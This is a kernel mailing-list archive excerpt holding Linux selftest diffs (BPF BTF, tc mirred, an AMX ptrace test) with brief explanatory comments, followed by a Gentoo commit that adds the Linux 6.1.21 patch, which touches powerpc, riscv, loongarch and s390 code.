+--- a/tools/testing/selftests/bpf/prog_tests/btf.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf.c
+@@ -879,6 +879,34 @@ static struct btf_raw_test raw_tests[] = {
+ 	.btf_load_err = true,
+ 	.err_str = "Invalid elem",
+ },
++{
++	.descr = "var after datasec, ptr followed by modifier",
++	.raw_types = {
++		/* .bss section */				/* [1] */
++		BTF_TYPE_ENC(NAME_TBD, BTF_INFO_ENC(BTF_KIND_DATASEC, 0, 2),
++			sizeof(void*)+4),
++		BTF_VAR_SECINFO_ENC(4, 0, sizeof(void*)),
++		BTF_VAR_SECINFO_ENC(6, sizeof(void*), 4),
++		/* int */					/* [2] */
++		BTF_TYPE_INT_ENC(0, BTF_INT_SIGNED, 0, 32, 4),
++		/* int* */					/* [3] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_PTR, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 3, 0),			/* [4] */
++		/* const int */					/* [5] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_CONST, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 5, 0),			/* [6] */
++		BTF_END_RAW,
++	},
++	.str_sec = "\0a\0b\0c\0",
++	.str_sec_size = sizeof("\0a\0b\0c\0"),
++	.map_type = BPF_MAP_TYPE_ARRAY,
++	.map_name = ".bss",
++	.key_size = sizeof(int),
++	.value_size = sizeof(void*)+4,
++	.key_type_id = 0,
++	.value_type_id = 1,
++	.max_entries = 1,
++},
+ /* Test member exceeds the size of struct.
+  *
+  * struct A {
+diff --git a/tools/testing/selftests/net/forwarding/tc_actions.sh b/tools/testing/selftests/net/forwarding/tc_actions.sh
+index 1e0a62f638fec..919c0dd9fe4bc 100755
+--- a/tools/testing/selftests/net/forwarding/tc_actions.sh
++++ b/tools/testing/selftests/net/forwarding/tc_actions.sh
+@@ -3,7 +3,8 @@
+ 
+ ALL_TESTS="gact_drop_and_ok_test mirred_egress_redirect_test \
+ 	mirred_egress_mirror_test matchall_mirred_egress_mirror_test \
+-	gact_trap_test mirred_egress_to_ingress_test"
++	gact_trap_test mirred_egress_to_ingress_test \
++	mirred_egress_to_ingress_tcp_test"
+ NUM_NETIFS=4
+ source tc_common.sh
+ source lib.sh
+@@ -198,6 +199,52 @@ mirred_egress_to_ingress_test()
+ 	log_test "mirred_egress_to_ingress ($tcflags)"
+ }
+ 
++mirred_egress_to_ingress_tcp_test()
++{
++	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
++
++	RET=0
++	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
++	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \
++		$tcflags ip_proto tcp src_ip 192.0.2.1 dst_ip 192.0.2.2 \
++			action ct commit nat src addr 192.0.2.2 pipe \
++			action ct clear pipe \
++			action ct commit nat dst addr 192.0.2.1 pipe \
++			action ct clear pipe \
++			action skbedit ptype host pipe \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 101 handle 101 egress flower \
++		$tcflags ip_proto icmp \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 102 handle 102 ingress flower \
++		ip_proto icmp \
++			action drop
++
++	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1  &
++	local rpid=$!
++	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
++	wait -n $rpid
++	cmp -s $tmpfile $tmpfile1
++	check_err $? "server output check failed"
++
++	$MZ $h1 -c 10 -p 64 -a $h1mac -b $h1mac -A 192.0.2.1 -B 192.0.2.1 \
++		-t icmp "ping,id=42,seq=5" -q
++	tc_check_packets "dev $h1 egress" 101 10
++	check_err $? "didn't mirred redirect ICMP"
++	tc_check_packets "dev $h1 ingress" 102 10
++	check_err $? "didn't drop mirred ICMP"
++	local overlimits=$(tc_rule_stats_get ${h1} 101 egress .overlimits)
++	test ${overlimits} = 10
++	check_err $? "wrong overlimits, expected 10 got ${overlimits}"
++
++	tc filter del dev $h1 egress protocol ip pref 100 handle 100 flower
++	tc filter del dev $h1 egress protocol ip pref 101 handle 101 flower
++	tc filter del dev $h1 ingress protocol ip pref 102 handle 102 flower
++
++	rm -f $tmpfile $tmpfile1
++	log_test "mirred_egress_to_ingress_tcp ($tcflags)"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/x86/amx.c b/tools/testing/selftests/x86/amx.c
+index 625e42901237c..d884fd69dd510 100644
+--- a/tools/testing/selftests/x86/amx.c
++++ b/tools/testing/selftests/x86/amx.c
+@@ -14,8 +14,10 @@
+ #include <sys/auxv.h>
+ #include <sys/mman.h>
+ #include <sys/shm.h>
++#include <sys/ptrace.h>
+ #include <sys/syscall.h>
+ #include <sys/wait.h>
++#include <sys/uio.h>
+ 
+ #include "../kselftest.h" /* For __cpuid_count() */
+ 
+@@ -583,6 +585,13 @@ static void test_dynamic_state(void)
+ 	_exit(0);
+ }
+ 
++static inline int __compare_tiledata_state(struct xsave_buffer *xbuf1, struct xsave_buffer *xbuf2)
++{
++	return memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
++		      &xbuf2->bytes[xtiledata.xbuf_offset],
++		      xtiledata.size);
++}
++
+ /*
+  * Save current register state and compare it to @xbuf1.'
+  *
+@@ -599,9 +608,7 @@ static inline bool __validate_tiledata_regs(struct xsave_buffer *xbuf1)
+ 		fatal_error("failed to allocate XSAVE buffer\n");
+ 
+ 	xsave(xbuf2, XFEATURE_MASK_XTILEDATA);
+-	ret = memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
+-		     &xbuf2->bytes[xtiledata.xbuf_offset],
+-		     xtiledata.size);
++	ret = __compare_tiledata_state(xbuf1, xbuf2);
+ 
+ 	free(xbuf2);
+ 
+@@ -826,6 +833,99 @@ static void test_context_switch(void)
+ 	free(finfo);
+ }
+ 
++/* Ptrace test */
++
++/*
++ * Make sure the ptracee has the expanded kernel buffer on the first
++ * use. Then, initialize the state before performing the state
++ * injection from the ptracer.
++ */
++static inline void ptracee_firstuse_tiledata(void)
++{
++	load_rand_tiledata(stashed_xsave);
++	init_xtiledata();
++}
++
++/*
++ * Ptracer injects the randomized tile data state. It also reads
++ * before and after that, which will execute the kernel's state copy
++ * functions. So, the tester is advised to double-check any emitted
++ * kernel messages.
++ */
++static void ptracer_inject_tiledata(pid_t target)
++{
++	struct xsave_buffer *xbuf;
++	struct iovec iov;
++
++	xbuf = alloc_xbuf();
++	if (!xbuf)
++		fatal_error("unable to allocate XSAVE buffer");
++
++	printf("\tRead the init'ed tiledata via ptrace().\n");
++
++	iov.iov_base = xbuf;
++	iov.iov_len = xbuf_size;
++
++	memset(stashed_xsave, 0, xbuf_size);
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tThe init'ed tiledata was read from ptracee.\n");
++	else
++		printf("[FAIL]\tThe init'ed tiledata was not read from ptracee.\n");
++
++	printf("\tInject tiledata via ptrace().\n");
++
++	load_rand_tiledata(xbuf);
++
++	memcpy(&stashed_xsave->bytes[xtiledata.xbuf_offset],
++	       &xbuf->bytes[xtiledata.xbuf_offset],
++	       xtiledata.size);
++
++	if (ptrace(PTRACE_SETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_SETREGSET");
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tTiledata was correctly written to ptracee.\n");
++	else
++		printf("[FAIL]\tTiledata was not correctly written to ptracee.\n");
++}
++
++static void test_ptrace(void)
++{
++	pid_t child;
++	int status;
++
++	child = fork();
++	if (child < 0) {
++		err(1, "fork");
++	} else if (!child) {
++		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
++			err(1, "PTRACE_TRACEME");
++
++		ptracee_firstuse_tiledata();
++
++		raise(SIGTRAP);
++		_exit(0);
++	}
++
++	do {
++		wait(&status);
++	} while (WSTOPSIG(status) != SIGTRAP);
++
++	ptracer_inject_tiledata(child);
++
++	ptrace(PTRACE_DETACH, child, NULL, NULL);
++	wait(&status);
++	if (!WIFEXITED(status) || WEXITSTATUS(status))
++		err(1, "ptrace test");
++}
++
+ int main(void)
+ {
+ 	/* Check hardware availability at first */
+@@ -846,6 +946,8 @@ int main(void)
+ 	ctxtswtest_config.num_threads = 5;
+ 	test_context_switch();
+ 
++	test_ptrace();
++
+ 	clearhandler(SIGILL);
+ 	free_stashed_xsave();
+ 
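
The new test drives the kernel's XSTATE copy paths through the iovec-based regset API: PTRACE_GETREGSET and PTRACE_SETREGSET with NT_X86_XSTATE. A minimal sketch of that API, shown here with the portable NT_PRSTATUS regset since the XSTATE layout is CPU-specific (a sketch only, not the selftest's code):

#include <elf.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
	struct user_regs_struct regs;
	struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
	pid_t child = fork();
	int status;

	if (child < 0)
		exit(1);
	if (!child) {
		ptrace(PTRACE_TRACEME, 0, NULL, NULL);
		raise(SIGTRAP);		/* stop so the parent can inspect us */
		_exit(0);
	}
	waitpid(child, &status, 0);
	if (ptrace(PTRACE_GETREGSET, child, NT_PRSTATUS, &iov))
		perror("PTRACE_GETREGSET");
	else
		printf("regset size read: %zu bytes\n", iov.iov_len);
	ptrace(PTRACE_DETACH, child, NULL, NULL);
	waitpid(child, &status, 0);
	return 0;
}
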


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-22 14:15 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-03-22 14:15 UTC (permalink / raw
  To: gentoo-commits

commit:     c77ff52621e2516013ea35cbd4c1e4b6e61fa1c6
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 22 13:47:09 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Mar 22 13:47:09 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c77ff526

Linux patch 6.1.21

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1020_linux-6.1.21.patch | 6760 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6764 insertions(+)

diff --git a/0000_README b/0000_README
index 4b2b0a69..2837c0f3 100644
--- a/0000_README
+++ b/0000_README
@@ -123,6 +123,10 @@ Patch:  1019_linux-6.1.20.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.20
 
+Patch:  1020_linux-6.1.21.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.21
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1020_linux-6.1.21.patch b/1020_linux-6.1.21.patch
new file mode 100644
index 00000000..bf455722
--- /dev/null
+++ b/1020_linux-6.1.21.patch
@@ -0,0 +1,6760 @@
+diff --git a/Documentation/filesystems/vfs.rst b/Documentation/filesystems/vfs.rst
+index 2b55f71e2ae19..b5e8b8af8afbb 100644
+--- a/Documentation/filesystems/vfs.rst
++++ b/Documentation/filesystems/vfs.rst
+@@ -1221,7 +1221,7 @@ defined:
+ 	return
+ 	-ECHILD and it will be called again in ref-walk mode.
+ 
+-``_weak_revalidate``
++``d_weak_revalidate``
+ 	called when the VFS needs to revalidate a "jumped" dentry.  This
+ 	is called when a path-walk ends at dentry that was not acquired
+ 	by doing a lookup in the parent directory.  This includes "/",
+diff --git a/Makefile b/Makefile
+index a842ec6d19325..0a9f0770bdf3a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 20
++SUBLEVEL = 21
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/loongarch/kernel/time.c b/arch/loongarch/kernel/time.c
+index 786735dcc8d67..d2b7d5df132a9 100644
+--- a/arch/loongarch/kernel/time.c
++++ b/arch/loongarch/kernel/time.c
+@@ -135,16 +135,17 @@ static int get_timer_irq(void)
+ 
+ int constant_clockevent_init(void)
+ {
+-	int irq;
+ 	unsigned int cpu = smp_processor_id();
+ 	unsigned long min_delta = 0x600;
+ 	unsigned long max_delta = (1UL << 48) - 1;
+ 	struct clock_event_device *cd;
+-	static int timer_irq_installed = 0;
++	static int irq = 0, timer_irq_installed = 0;
+ 
+-	irq = get_timer_irq();
+-	if (irq < 0)
+-		pr_err("Failed to map irq %d (timer)\n", irq);
++	if (!timer_irq_installed) {
++		irq = get_timer_irq();
++		if (irq < 0)
++			pr_err("Failed to map irq %d (timer)\n", irq);
++	}
+ 
+ 	cd = &per_cpu(constant_clockevent_device, cpu);
+ 
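
The loongarch fix above makes the irq variable function-local static alongside the existing timer_irq_installed flag, so the irq is mapped once rather than re-looked-up on every per-CPU init call. A small user-space sketch of the once-only initialization idiom it relies on (simplified, hypothetical names):

#include <stdio.h>

static int map_timer_irq(void)
{
	puts("mapping timer irq");	/* expensive; should run once */
	return 63;
}

static int clockevent_init(void)
{
	static int irq, installed;

	if (!installed) {		/* first caller does the lookup */
		irq = map_timer_irq();
		installed = 1;
	}
	return irq;			/* later callers reuse the result */
}

int main(void)
{
	clockevent_init();
	clockevent_init();		/* prints nothing the second time */
	return 0;
}
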
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 4fd630efe39d3..894d48cd04920 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -146,19 +146,6 @@ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option, $(MULTIPLEWORD))
+ 
+ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option,-mno-readonly-in-sdata)
+ 
+-ifdef CONFIG_PPC_BOOK3S_64
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power8
+-else
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power4
+-endif
+-CFLAGS-$(CONFIG_GENERIC_CPU) += $(call cc-option,-mtune=power10,	\
+-				  $(call cc-option,-mtune=power9,	\
+-				  $(call cc-option,-mtune=power8)))
+-else ifdef CONFIG_PPC_BOOK3E_64
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=powerpc64
+-endif
+-
+ ifdef CONFIG_FUNCTION_TRACER
+ CC_FLAGS_FTRACE := -pg
+ ifdef CONFIG_MPROFILE_KERNEL
+@@ -166,11 +153,12 @@ CC_FLAGS_FTRACE += -mprofile-kernel
+ endif
+ endif
+ 
+-CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
+-AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
++CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
++AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
+ 
+-CFLAGS-$(CONFIG_E5500_CPU) += $(call cc-option,-mcpu=e500mc64,-mcpu=powerpc64)
+-CFLAGS-$(CONFIG_E6500_CPU) += $(call cc-option,-mcpu=e6500,$(E5500_CPU))
++CFLAGS-$(CONFIG_POWERPC64_CPU) += $(call cc-option,-mtune=power10,	\
++				  $(call cc-option,-mtune=power9,	\
++				  $(call cc-option,-mtune=power8)))
+ 
+ asinstr := $(call as-instr,lis 9$(comma)foo@high,-DHAVE_AS_ATHIGH=1)
+ 
+@@ -213,10 +201,7 @@ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ # often slow when they are implemented at all
+ KBUILD_CFLAGS		+= $(call cc-option,-mno-string)
+ 
+-cpu-as-$(CONFIG_40x)		+= -Wa,-m405
+-cpu-as-$(CONFIG_44x)		+= -Wa,-m440
+ cpu-as-$(CONFIG_ALTIVEC)	+= $(call as-option,-Wa$(comma)-maltivec)
+-cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ 
+ # When using '-many -mpower4' gas will first try and find a matching power4
+ # mnemonic and failing that it will allow any valid mnemonic that GAS knows
+@@ -224,7 +209,6 @@ cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ # LLVM IAS doesn't understand either flag: https://github.com/ClangBuiltLinux/linux/issues/675
+ # but LLVM IAS only supports ISA >= 2.06 for Book3S 64 anyway...
+ cpu-as-$(CONFIG_PPC_BOOK3S_64)	+= $(call as-option,-Wa$(comma)-mpower4) $(call as-option,-Wa$(comma)-many)
+-cpu-as-$(CONFIG_PPC_E500MC)	+= $(call as-option,-Wa$(comma)-me500mc)
+ 
+ KBUILD_AFLAGS += $(cpu-as-y)
+ KBUILD_CFLAGS += $(cpu-as-y)
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index d32d95aea5d6f..295f76df13b55 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -39,13 +39,19 @@ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 $(LINUXINCLUDE)
+ 
+ ifdef CONFIG_PPC64_BOOT_WRAPPER
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64le
++BOOTCFLAGS	+= -m64
+ else
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64
++BOOTCFLAGS	+= -m32
+ endif
++
++ifdef CONFIG_TARGET_CPU_BOOL
++BOOTCFLAGS	+= -mcpu=$(CONFIG_TARGET_CPU)
++else ifdef CONFIG_PPC64_BOOT_WRAPPER
++ifdef CONFIG_CPU_LITTLE_ENDIAN
++BOOTCFLAGS	+= -mcpu=powerpc64le
+ else
+-BOOTCFLAGS	+= -m32 -mcpu=powerpc
++BOOTCFLAGS	+= -mcpu=powerpc64
++endif
+ endif
+ 
+ BOOTCFLAGS	+= -isystem $(shell $(BOOTCC) -print-file-name=include)
+diff --git a/arch/powerpc/mm/fault.c b/arch/powerpc/mm/fault.c
+index 2bef19cc1b98c..af46aa88422bf 100644
+--- a/arch/powerpc/mm/fault.c
++++ b/arch/powerpc/mm/fault.c
+@@ -271,11 +271,16 @@ static bool access_error(bool is_write, bool is_exec, struct vm_area_struct *vma
+ 	}
+ 
+ 	/*
+-	 * Check for a read fault.  This could be caused by a read on an
+-	 * inaccessible page (i.e. PROT_NONE), or a Radix MMU execute-only page.
++	 * VM_READ, VM_WRITE and VM_EXEC all imply read permissions, as
++	 * defined in protection_map[].  Read faults can only be caused by
++	 * a PROT_NONE mapping, or with a PROT_EXEC-only mapping on Radix.
+ 	 */
+-	if (unlikely(!(vma->vm_flags & VM_READ)))
++	if (unlikely(!vma_is_accessible(vma)))
+ 		return true;
++
++	if (unlikely(radix_enabled() && ((vma->vm_flags & VM_ACCESS_FLAGS) == VM_EXEC)))
++		return true;
++
+ 	/*
+ 	 * We should ideally do the vma pkey access check here. But in the
+ 	 * fault path, handle_mm_fault() also does the same check. To avoid
+diff --git a/arch/powerpc/platforms/Kconfig.cputype b/arch/powerpc/platforms/Kconfig.cputype
+index 0c4eed9aea806..54d655a647cec 100644
+--- a/arch/powerpc/platforms/Kconfig.cputype
++++ b/arch/powerpc/platforms/Kconfig.cputype
+@@ -118,19 +118,18 @@ endchoice
+ 
+ choice
+ 	prompt "CPU selection"
+-	default GENERIC_CPU
+ 	help
+ 	  This will create a kernel which is optimised for a particular CPU.
+ 	  The resulting kernel may not run on other CPUs, so use this with care.
+ 
+ 	  If unsure, select Generic.
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER5 and PowerPC 970 and above)"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
+ 	select PPC_64S_HASH_MMU
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER8 and above)"
+ 	depends on PPC_BOOK3S_64 && CPU_LITTLE_ENDIAN
+ 	select ARCH_HAS_FAST_MULTIPLIER
+@@ -143,6 +142,7 @@ config POWERPC_CPU
+ config CELL_CPU
+ 	bool "Cell Broadband Engine"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
++	depends on !CC_IS_CLANG
+ 	select PPC_64S_HASH_MMU
+ 
+ config PPC_970_CPU
+@@ -184,10 +184,12 @@ config E5500_CPU
+ config E6500_CPU
+ 	bool "Freescale e6500"
+ 	depends on PPC64 && PPC_E500
++	depends on !CC_IS_CLANG
+ 
+ config 405_CPU
+ 	bool "40x family"
+ 	depends on 40x
++	depends on !CC_IS_CLANG
+ 
+ config 440_CPU
+ 	bool "440 (44x family)"
+@@ -196,22 +198,27 @@ config 440_CPU
+ config 464_CPU
+ 	bool "464 (44x family)"
+ 	depends on 44x
++	depends on !CC_IS_CLANG
+ 
+ config 476_CPU
+ 	bool "476 (47x family)"
+ 	depends on PPC_47x
++	depends on !CC_IS_CLANG
+ 
+ config 860_CPU
+ 	bool "8xx family"
+ 	depends on PPC_8xx
++	depends on !CC_IS_CLANG
+ 
+ config E300C2_CPU
+ 	bool "e300c2 (832x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config E300C3_CPU
+ 	bool "e300c3 (831x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config G4_CPU
+ 	bool "G4 (74xx)"
+@@ -228,13 +235,12 @@ config E500MC_CPU
+ 
+ config TOOLCHAIN_DEFAULT_CPU
+ 	bool "Rely on the toolchain's implicit default CPU"
+-	depends on PPC32
+ 
+ endchoice
+ 
+ config TARGET_CPU_BOOL
+ 	bool
+-	default !GENERIC_CPU && !TOOLCHAIN_DEFAULT_CPU
++	default !TOOLCHAIN_DEFAULT_CPU
+ 
+ config TARGET_CPU
+ 	string
+@@ -246,6 +252,10 @@ config TARGET_CPU
+ 	default "power8" if POWER8_CPU
+ 	default "power9" if POWER9_CPU
+ 	default "power10" if POWER10_CPU
++	default "e5500" if E5500_CPU
++	default "e6500" if E6500_CPU
++	default "power4" if POWERPC64_CPU && !CPU_LITTLE_ENDIAN
++	default "power8" if POWERPC64_CPU && CPU_LITTLE_ENDIAN
+ 	default "405" if 405_CPU
+ 	default "440" if 440_CPU
+ 	default "464" if 464_CPU
+diff --git a/arch/riscv/include/asm/mmu.h b/arch/riscv/include/asm/mmu.h
+index 5ff1f19fd45c2..0099dc1161683 100644
+--- a/arch/riscv/include/asm/mmu.h
++++ b/arch/riscv/include/asm/mmu.h
+@@ -19,8 +19,6 @@ typedef struct {
+ #ifdef CONFIG_SMP
+ 	/* A local icache flush is needed before user execution can resume. */
+ 	cpumask_t icache_stale_mask;
+-	/* A local tlb flush is needed before user execution can resume. */
+-	cpumask_t tlb_stale_mask;
+ #endif
+ } mm_context_t;
+ 
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 907b9efd39a87..801019381dea3 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -22,24 +22,6 @@ static inline void local_flush_tlb_page(unsigned long addr)
+ {
+ 	ALT_FLUSH_TLB_PAGE(__asm__ __volatile__ ("sfence.vma %0" : : "r" (addr) : "memory"));
+ }
+-
+-static inline void local_flush_tlb_all_asid(unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma x0, %0"
+-			:
+-			: "r" (asid)
+-			: "memory");
+-}
+-
+-static inline void local_flush_tlb_page_asid(unsigned long addr,
+-		unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma %0, %1"
+-			:
+-			: "r" (addr), "r" (asid)
+-			: "memory");
+-}
+-
+ #else /* CONFIG_MMU */
+ #define local_flush_tlb_all()			do { } while (0)
+ #define local_flush_tlb_page(addr)		do { } while (0)
+diff --git a/arch/riscv/mm/context.c b/arch/riscv/mm/context.c
+index 80ce9caba8d22..0f784e3d307bb 100644
+--- a/arch/riscv/mm/context.c
++++ b/arch/riscv/mm/context.c
+@@ -196,16 +196,6 @@ switch_mm_fast:
+ 
+ 	if (need_flush_tlb)
+ 		local_flush_tlb_all();
+-#ifdef CONFIG_SMP
+-	else {
+-		cpumask_t *mask = &mm->context.tlb_stale_mask;
+-
+-		if (cpumask_test_cpu(cpu, mask)) {
+-			cpumask_clear_cpu(cpu, mask);
+-			local_flush_tlb_all_asid(cntx & asid_mask);
+-		}
+-	}
+-#endif
+ }
+ 
+ static void set_mm_noasid(struct mm_struct *mm)
+@@ -215,12 +205,24 @@ static void set_mm_noasid(struct mm_struct *mm)
+ 	local_flush_tlb_all();
+ }
+ 
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+-	if (static_branch_unlikely(&use_asid_allocator))
+-		set_mm_asid(mm, cpu);
+-	else
+-		set_mm_noasid(mm);
++	/*
++	 * The mm_cpumask indicates which harts' TLBs contain the virtual
++	 * address mapping of the mm. Compared to noasid, using asid
++	 * can't guarantee that stale TLB entries are invalidated because
++	 * the asid mechanism wouldn't flush TLB for every switch_mm for
++	 * performance. So when using asid, keep all CPUs footmarks in
++	 * cpumask() until mm reset.
++	 */
++	cpumask_set_cpu(cpu, mm_cpumask(next));
++	if (static_branch_unlikely(&use_asid_allocator)) {
++		set_mm_asid(next, cpu);
++	} else {
++		cpumask_clear_cpu(cpu, mm_cpumask(prev));
++		set_mm_noasid(next);
++	}
+ }
+ 
+ static int __init asids_init(void)
+@@ -274,7 +276,8 @@ static int __init asids_init(void)
+ }
+ early_initcall(asids_init);
+ #else
+-static inline void set_mm(struct mm_struct *mm, unsigned int cpu)
++static inline void set_mm(struct mm_struct *prev,
++			  struct mm_struct *next, unsigned int cpu)
+ {
+ 	/* Nothing to do here when there is no MMU */
+ }
+@@ -327,10 +330,7 @@ void switch_mm(struct mm_struct *prev, struct mm_struct *next,
+ 	 */
+ 	cpu = smp_processor_id();
+ 
+-	cpumask_clear_cpu(cpu, mm_cpumask(prev));
+-	cpumask_set_cpu(cpu, mm_cpumask(next));
+-
+-	set_mm(next, cpu);
++	set_mm(prev, next, cpu);
+ 
+ 	flush_icache_deferred(next, cpu);
+ }
+diff --git a/arch/riscv/mm/tlbflush.c b/arch/riscv/mm/tlbflush.c
+index ce7dfc81bb3fe..37ed760d007c3 100644
+--- a/arch/riscv/mm/tlbflush.c
++++ b/arch/riscv/mm/tlbflush.c
+@@ -5,7 +5,23 @@
+ #include <linux/sched.h>
+ #include <asm/sbi.h>
+ #include <asm/mmu_context.h>
+-#include <asm/tlbflush.h>
++
++static inline void local_flush_tlb_all_asid(unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma x0, %0"
++			:
++			: "r" (asid)
++			: "memory");
++}
++
++static inline void local_flush_tlb_page_asid(unsigned long addr,
++		unsigned long asid)
++{
++	__asm__ __volatile__ ("sfence.vma %0, %1"
++			:
++			: "r" (addr), "r" (asid)
++			: "memory");
++}
+ 
+ void flush_tlb_all(void)
+ {
+@@ -15,7 +31,6 @@ void flush_tlb_all(void)
+ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 				  unsigned long size, unsigned long stride)
+ {
+-	struct cpumask *pmask = &mm->context.tlb_stale_mask;
+ 	struct cpumask *cmask = mm_cpumask(mm);
+ 	unsigned int cpuid;
+ 	bool broadcast;
+@@ -29,15 +44,6 @@ static void __sbi_tlb_flush_range(struct mm_struct *mm, unsigned long start,
+ 	if (static_branch_unlikely(&use_asid_allocator)) {
+ 		unsigned long asid = atomic_long_read(&mm->context.id);
+ 
+-		/*
+-		 * TLB will be immediately flushed on harts concurrently
+-		 * executing this MM context. TLB flush on other harts
+-		 * is deferred until this MM context migrates there.
+-		 */
+-		cpumask_setall(pmask);
+-		cpumask_clear_cpu(cpuid, pmask);
+-		cpumask_andnot(pmask, pmask, cmask);
+-
+ 		if (broadcast) {
+ 			sbi_remote_sfence_vma_asid(cmask, start, size, asid);
+ 		} else if (size <= stride) {
+diff --git a/arch/s390/boot/ipl_report.c b/arch/s390/boot/ipl_report.c
+index 9b14045065b6e..74b5cd2648622 100644
+--- a/arch/s390/boot/ipl_report.c
++++ b/arch/s390/boot/ipl_report.c
+@@ -57,11 +57,19 @@ repeat:
+ 	if (IS_ENABLED(CONFIG_BLK_DEV_INITRD) && initrd_data.start && initrd_data.size &&
+ 	    intersects(initrd_data.start, initrd_data.size, safe_addr, size))
+ 		safe_addr = initrd_data.start + initrd_data.size;
++	if (intersects(safe_addr, size, (unsigned long)comps, comps->len)) {
++		safe_addr = (unsigned long)comps + comps->len;
++		goto repeat;
++	}
+ 	for_each_rb_entry(comp, comps)
+ 		if (intersects(safe_addr, size, comp->addr, comp->len)) {
+ 			safe_addr = comp->addr + comp->len;
+ 			goto repeat;
+ 		}
++	if (intersects(safe_addr, size, (unsigned long)certs, certs->len)) {
++		safe_addr = (unsigned long)certs + certs->len;
++		goto repeat;
